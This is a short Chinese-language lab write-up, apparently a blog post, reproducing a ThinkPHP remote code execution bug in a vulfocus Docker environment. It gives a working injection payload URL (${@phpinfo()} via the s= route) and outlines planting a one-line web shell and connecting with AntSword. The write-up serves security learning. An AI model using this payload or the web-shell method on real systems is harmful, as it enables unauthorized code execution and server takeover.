thinkphp框架远程代码执行

凌晨五点的星2024-07-31 11:30

一、环境

vulfocus网上自行下载

启动命令:

复制代码 
 docker run -d --privileged -p 8081:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=192.168.131.144  8e55f85571c8

一定添加--privileged不然只能拉取环境首页不显示

二、thinkphp远程代码执行

首页:

先开始资产收集:

端口:

目录:

网上搜索历史cve

输入pyload

复制代码 
http://192.168.131.144:29319/index.php?s=/index/index/name/${@phpinfo()})

命令执行

使用bp抓包

替换成一句话木马

使用蚁剑去连接

相关推荐
介一安全14 小时前
【Web安全】泛微OA框架SRC高频漏洞分析总结
web安全·网络安全·安全性测试
jenchoi41317 小时前
【2025-11-01】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
网络·安全·web安全·网络安全
沐矢羽19 小时前
upload文件上传漏洞浅析
学习·web安全·网络安全·文件上传·top10
TOM写代码19 小时前
详解网络安全免杀对抗:攻防的猫鼠游戏
安全·web安全·网络安全
Pure_White_Sword19 小时前
Bugku-Web题目-cookies
web安全·网络安全·ctf
独行soc2 天前
2025年渗透测试面试题总结-224(题目+回答)
网络·python·安全·web安全·adb·渗透测试·安全狮
哈乐2 天前
网络安全应用题3:网络攻击与防范
安全·web安全·ddos
飘渺红尘✨2 天前
CSPT漏洞浅析
web安全·cspt
泷羽Sec-静安2 天前
Less-7 GET-Dump into outfile-String
android·前端·网络·sql·安全·web安全
jenchoi4132 天前
【2025-10-31】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
网络·安全·web安全·网络安全
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03《大数据技术原理与应用》实验报告三 熟悉HBase常用操作04BongoCat - 跨平台键盘猫动画工具05Linux下V2Ray安装配置指南06GitLab 零基础入门指南:从安装到项目管理全流程07NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南08jdk21下载、安装(Windows、Linux、macOS)09[架构之美]从零开始整合Spring Boot与Maven(十五)10基于vLLM的PaddleOCR-VL部署指南